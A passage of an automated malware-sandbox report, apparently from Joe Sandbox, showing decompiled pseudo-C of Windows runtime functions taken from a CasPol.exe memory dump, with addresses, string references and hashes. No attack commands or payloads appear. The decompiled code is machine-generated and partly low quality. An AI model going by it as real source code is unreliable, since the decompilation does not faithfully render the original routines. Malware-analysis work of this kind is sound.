				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E01660BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E016A3706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0166FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E016A3540;
						E0166FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0167DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E016B0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E016697C0();
					}
					return E0166B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E016A3971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E016A3884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0166FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E01669650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E016A3787(_a4,  &_v352, _t80);
						}
					}
					L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E016695D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                                                0x016a3552
                                                                0x016a355a
                                                                0x016a355d
                                                                0x016a3566
                                                                0x016a3567
                                                                0x016a357e
                                                                0x016a358f
                                                                0x016a35a1
                                                                0x016a35a5
                                                                0x016a366b
                                                                0x016a366b
                                                                0x016a366d
                                                                0x016a3672
                                                                0x016a3679
                                                                0x016a3685
                                                                0x016a368d
                                                                0x016a369d
                                                                0x016a36a7
                                                                0x016a36b8
                                                                0x016a36c6
                                                                0x016a36c7
                                                                0x016a36dc
                                                                0x016a36e1
                                                                0x016a36e7
                                                                0x016a36e9
                                                                0x016a36e9
                                                                0x016a3703
                                                                0x016a3703
                                                                0x016a35b5
                                                                0x016a35c0
                                                                0x016a35c4
                                                                0x00000000
                                                                0x00000000
                                                                0x016a35ca
                                                                0x016a35d7
                                                                0x016a35e2
                                                                0x016a35e6
                                                                0x016a35e8
                                                                0x016a35f5
                                                                0x016a35fa
                                                                0x016a3603
                                                                0x016a3604
                                                                0x016a3609
                                                                0x016a360a
                                                                0x016a3612
                                                                0x016a3613
                                                                0x016a361e
                                                                0x016a3622
                                                                0x016a3628
                                                                0x016a362f
                                                                0x016a362f
                                                                0x016a3636
                                                                0x016a3638
                                                                0x016a363b
                                                                0x016a3642
                                                                0x016a3642
                                                                0x016a3636
                                                                0x016a3657
                                                                0x016a3657
                                                                0x016a365c
                                                                0x016a3662
                                                                0x016a3669
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: BinaryHash
                                                                • API String ID: 0-2202222882
                                                                • Opcode ID: c846e8069ebf9da890be95773df122c91691fa26a0bcec34dd6be6971c48b235
                                                                • Instruction ID: 2f63872e68631eb02eb3ab39ce6539a402fca154bbf0f9d172c23d483a71750c
                                                                • Opcode Fuzzy Hash: c846e8069ebf9da890be95773df122c91691fa26a0bcec34dd6be6971c48b235
                                                                • Instruction Fuzzy Hash: 614134B2D0052D9BDB21DA54CC85FEEB77DAB54714F4045E9EA09AB240DB309E88CF98
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016F05AC Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 71%
                                                                			E016F05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E016F07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E01669730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E016EA80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E016EA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E016F1293(_t79, _v40, E016F07DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E01647D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E016E138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                                                                0x016f05c5
                                                                0x016f05ca
                                                                0x016f05d3
                                                                0x016f06db
                                                                0x016f06db
                                                                0x016f06dd
                                                                0x016f06e3
                                                                0x016f06e3
                                                                0x016f05dd
                                                                0x016f05e7
                                                                0x016f05f6
                                                                0x016f0600
                                                                0x016f0607
                                                                0x016f0610
                                                                0x016f0615
                                                                0x016f061a
                                                                0x016f061c
                                                                0x016f061e
                                                                0x016f0624
                                                                0x016f0625
                                                                0x016f0627
                                                                0x016f0628
                                                                0x016f0631
                                                                0x016f0640
                                                                0x016f064d
                                                                0x016f0654
                                                                0x016f0654
                                                                0x016f0631
                                                                0x016f066d
                                                                0x016f0674
                                                                0x00000000
                                                                0x00000000
                                                                0x016f0692
                                                                0x016f069e
                                                                0x016f06b0
                                                                0x016f06a0
                                                                0x016f06a9
                                                                0x016f06a9
                                                                0x016f06b8
                                                                0x016f06d6
                                                                0x016f06d6
                                                                0x00000000

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: `
                                                                • API String ID: 0-2679148245
                                                                • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                • Instruction ID: 245c6719428f28e56a69c1e42f8b9b6f100ffd6d3c6d2fcc6ec222b0f5e0ef1f
                                                                • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                • Instruction Fuzzy Hash: 4D31F132300356ABE720DE28CC84F9B7BDAEB84754F14422DFB589B281D770E904CB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016A3884 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 72%
                                                                			E016A3884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E01669650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L01644620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E01669650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                                                0x016a3893
                                                                0x016a3896
                                                                0x016a3899
                                                                0x016a389f
                                                                0x016a38a0
                                                                0x016a38a4
                                                                0x016a38a9
                                                                0x016a38ac
                                                                0x016a38ad
                                                                0x016a38ae
                                                                0x016a38af
                                                                0x016a38b1
                                                                0x016a38b4
                                                                0x016a38bb
                                                                0x016a38bc
                                                                0x016a38bd
                                                                0x016a38c4
                                                                0x016a38c8
                                                                0x016a38ca
                                                                0x016a38ca
                                                                0x016a38d5
                                                                0x016a393e
                                                                0x016a3940
                                                                0x016a3942
                                                                0x016a3952
                                                                0x016a3954
                                                                0x016a3961
                                                                0x016a3961
                                                                0x016a3967
                                                                0x016a396e
                                                                0x016a396e
                                                                0x016a3947
                                                                0x016a394c
                                                                0x00000000
                                                                0x016a394c
                                                                0x016a38ea
                                                                0x016a38ee
                                                                0x016a38f8
                                                                0x016a38f9
                                                                0x016a38ff
                                                                0x016a3900
                                                                0x016a3902
                                                                0x016a3903
                                                                0x016a390b
                                                                0x016a390f
                                                                0x016a3950
                                                                0x00000000
                                                                0x016a3950
                                                                0x016a3915
                                                                0x016a391d
                                                                0x016a391d
                                                                0x016a3922
                                                                0x016a3926
                                                                0x00000000
                                                                0x016a3928
                                                                0x016a392b
                                                                0x016a392b
                                                                0x016a3935
                                                                0x016a3937
                                                                0x016a3937
                                                                0x00000000
                                                                0x016a3935
                                                                0x016a3926
                                                                0x016a38f0
                                                                0x00000000

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: BinaryName
                                                                • API String ID: 0-215506332
                                                                • Opcode ID: 7ac3edfb7611abc995b1b57093c6ef743e4675721f149c2e6ea820f5d7b2da92
                                                                • Instruction ID: 106b92232dbf05dd02ad048398bd4c778d4177bc123a79df8a72b06f98114b20
                                                                • Opcode Fuzzy Hash: 7ac3edfb7611abc995b1b57093c6ef743e4675721f149c2e6ea820f5d7b2da92
                                                                • Instruction Fuzzy Hash: E531E33290061AAFEB16DA58CD45E7BFB79FF80B20F414169E914A7391E7309E04CBE0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0165D294 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 33%
                                                                			E0165D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x171d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E01644120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E0166B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E016698D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E016695D0();
					L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                                                0x0165d29c
                                                                0x0165d2a6
                                                                0x0165d2b1
                                                                0x0165d2b5
                                                                0x0165d2b6
                                                                0x0165d2bc
                                                                0x0165d2bd
                                                                0x0165d2be
                                                                0x0165d2bf
                                                                0x0165d2c2
                                                                0x0165d2c4
                                                                0x0165d2cc
                                                                0x0165d384
                                                                0x0165d34b
                                                                0x0165d34f
                                                                0x0165d350
                                                                0x0165d351
                                                                0x0165d35c
                                                                0x0165d35c
                                                                0x0165d2d6
                                                                0x0165d2da
                                                                0x0165d2e1
                                                                0x0165d361
                                                                0x0165d369
                                                                0x0165d36d
                                                                0x0165d2e3
                                                                0x0165d2e3
                                                                0x0165d2e3
                                                                0x0165d2e5
                                                                0x0165d2ed
                                                                0x0165d2f5
                                                                0x0165d2fa
                                                                0x0165d302
                                                                0x0165d303
                                                                0x0165d30b
                                                                0x0165d30f
                                                                0x0165d313
                                                                0x0165d318
                                                                0x0165d31c
                                                                0x0165d320
                                                                0x0165d379
                                                                0x0165d37d
                                                                0x00000000
                                                                0x00000000
                                                                0x0169affe
                                                                0x0169b001
                                                                0x0169b011
                                                                0x00000000
                                                                0x0165d322
                                                                0x0165d322
                                                                0x0165d330
                                                                0x0165d337
                                                                0x0165d35d
                                                                0x0165d339
                                                                0x0165d33f
                                                                0x0165d38c
                                                                0x0165d38c
                                                                0x0165d33f
                                                                0x0165d349
                                                                0x00000000
                                                                0x0165d349

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @
                                                                • API String ID: 0-2766056989
                                                                • Opcode ID: 850afac078ee3a6f97c9d69812550600d45123ce0464df06da0b64440f64b971
                                                                • Instruction ID: 2f1c9c3bf9e0ea4ce3d90b3e62c22aba1c83726b40a4b26e20abaa599a5c9190
                                                                • Opcode Fuzzy Hash: 850afac078ee3a6f97c9d69812550600d45123ce0464df06da0b64440f64b971
                                                                • Instruction Fuzzy Hash: 5F319EB1509305DFC761DF68CC8096BBBE9EB96654F00092EF99483291D735DD05CB92
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01631B8F Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 72%
                                                                			E01631B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0166BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0166A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E0166A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L01644620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                                                0x01631b8f
                                                                0x01631b9a
                                                                0x01631b9c
                                                                0x01631b9e
                                                                0x01631ba3
                                                                0x01687010
                                                                0x01687010
                                                                0x00000000
                                                                0x01631ba9
                                                                0x01631ba9
                                                                0x01631bae
                                                                0x00000000
                                                                0x01631bc5
                                                                0x01631bca
                                                                0x01631bcf
                                                                0x01631bd0
                                                                0x01631bd1
                                                                0x01631bd2
                                                                0x01631bd6
                                                                0x01631bdc
                                                                0x01631be0
                                                                0x01686ffc
                                                                0x01687000
                                                                0x00000000
                                                                0x01687006
                                                                0x01687009
                                                                0x01687009
                                                                0x01631be6
                                                                0x01631bec
                                                                0x01631c0b
                                                                0x01631c0b
                                                                0x01631c0c
                                                                0x01631c11
                                                                0x01631c12
                                                                0x01631c15
                                                                0x01631c1b
                                                                0x01631c1f
                                                                0x01631c31
                                                                0x01631c33
                                                                0x01687026
                                                                0x01687026
                                                                0x01631c21
                                                                0x01631c24
                                                                0x01631c24
                                                                0x01631bee
                                                                0x01631bee
                                                                0x01631bf2
                                                                0x01631c3a
                                                                0x01631bf4
                                                                0x01631bf4
                                                                0x01631c05
                                                                0x01631c05
                                                                0x01631c09
                                                                0x01631c3e
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x01631c09
                                                                0x01631bec
                                                                0x01631be0
                                                                0x01631bae
                                                                0x01631c2e

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: WindowsExcludedProcs
                                                                • API String ID: 0-3583428290
                                                                • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                • Instruction ID: fd7e4f718cf20861ba4d24018dceda117bef44e183eb2ea903049b4a0f00732d
                                                                • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                • Instruction Fuzzy Hash: 9C210A7A500129ABDB22AA59CC40F5B7BADEF82650F154525FE149B300DB38DC02D7B0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0164F716 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E0164F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                                                                0x0164f71d
                                                                0x0164f722
                                                                0x0164f726
                                                                0x01694770
                                                                0x0164f765
                                                                0x0164f769
                                                                0x0164f769
                                                                0x0164f732
                                                                0x0169477a
                                                                0x00000000
                                                                0x0169477a
                                                                0x0164f738
                                                                0x0164f73a
                                                                0x0164f73c
                                                                0x0164f73f
                                                                0x0164f746
                                                                0x0164f778
                                                                0x0164f7a9
                                                                0x0164f7a9
                                                                0x0164f754
                                                                0x0164f75a
                                                                0x0164f75d
                                                                0x0164f75f
                                                                0x0164f761
                                                                0x0164f76f
                                                                0x0164f771
                                                                0x0164f771
                                                                0x0164f76f
                                                                0x0164f763
                                                                0x00000000
                                                                0x0164f763
                                                                0x0164f77d
                                                                0x0164f7a3
                                                                0x0164f7a5
                                                                0x00000000
                                                                0x0164f7a5
                                                                0x0164f77f
                                                                0x0164f782
                                                                0x0164f784
                                                                0x0164f786
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0164f788
                                                                0x0164f748
                                                                0x0164f74d
                                                                0x0164f78d
                                                                0x0164f793
                                                                0x0164f7b7
                                                                0x0164f7bc
                                                                0x00000000
                                                                0x0164f7bc
                                                                0x0164f798
                                                                0x00000000
                                                                0x00000000
                                                                0x0164f79d
                                                                0x0164f7b0
                                                                0x00000000
                                                                0x0164f7b0
                                                                0x0164f79f
                                                                0x00000000
                                                                0x0164f74f
                                                                0x0164f74f
                                                                0x00000000
                                                                0x0164f74f

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Actx
                                                                • API String ID: 0-89312691
                                                                • Opcode ID: bab9ce06ef083de20ac0758a40abd9d22f8255bf078593306cb71230a98e121b
                                                                • Instruction ID: 190b1df04301c10f37ba06850f02e9742c7c329a9ba5b3831fd8b246fb41ad67
                                                                • Opcode Fuzzy Hash: bab9ce06ef083de20ac0758a40abd9d22f8255bf078593306cb71230a98e121b
                                                                • Instruction Fuzzy Hash: 281104347487028BFB25CE1CAD9073676D9EB85224F2445BAE462CB791DB7CC8028740
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016D8DF1 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 71%
                                                                			E016D8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x1700d50);
				E0167D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E016B5720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L0167DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L0167DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0167D130(_t34, _t39, _t40);
			}





                                                                0x016d8df1
                                                                0x016d8df1
                                                                0x016d8df1
                                                                0x016d8df1
                                                                0x016d8df1
                                                                0x016d8df1
                                                                0x016d8df3
                                                                0x016d8df8
                                                                0x016d8dfd
                                                                0x016d8e00
                                                                0x016d8e0e
                                                                0x016d8e2a
                                                                0x016d8e36
                                                                0x016d8e38
                                                                0x016d8e3c
                                                                0x016d8e46
                                                                0x016d8e46
                                                                0x016d8e36
                                                                0x016d8e50
                                                                0x016d8e56
                                                                0x016d8e59
                                                                0x016d8e5c
                                                                0x016d8e60
                                                                0x016d8e67
                                                                0x016d8e6d
                                                                0x016d8e73
                                                                0x016d8e74
                                                                0x016d8eb1
                                                                0x016d8ebd

                                                                Strings
                                                                • Critical error detected %lx, xrefs: 016D8E21
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Critical error detected %lx
                                                                • API String ID: 0-802127002
                                                                • Opcode ID: 06297f17eab8fb4b2e20805e4b51dcbc18297873025d27626a1969703cefe2e6
                                                                • Instruction ID: 49c0f31ad219901217edc380b24e1197ba61b7fd8974d2996b7a42dff53cdf64
                                                                • Opcode Fuzzy Hash: 06297f17eab8fb4b2e20805e4b51dcbc18297873025d27626a1969703cefe2e6
                                                                • Instruction Fuzzy Hash: 111157B1D14348DADF26DFA899097DDBBB5BF18315F24466EE529AB382C3344602CF18
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016BFF10 Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 016BFF60
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                • API String ID: 0-1911121157
                                                                • Opcode ID: fa602748c219903b96acfdcd814288341d28a17e3a6cbf4f5266f47a0ed2627f
                                                                • Instruction ID: 5bebac89330d510be6c2a42414c5d46adbf8e219a0c6d5b28c971471fdbff483
                                                                • Opcode Fuzzy Hash: fa602748c219903b96acfdcd814288341d28a17e3a6cbf4f5266f47a0ed2627f
                                                                • Instruction Fuzzy Hash: 2911C071910244EFDF26EF98CD89FD8BBB2FF09715F148498E5096B2A1C7399980DB90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

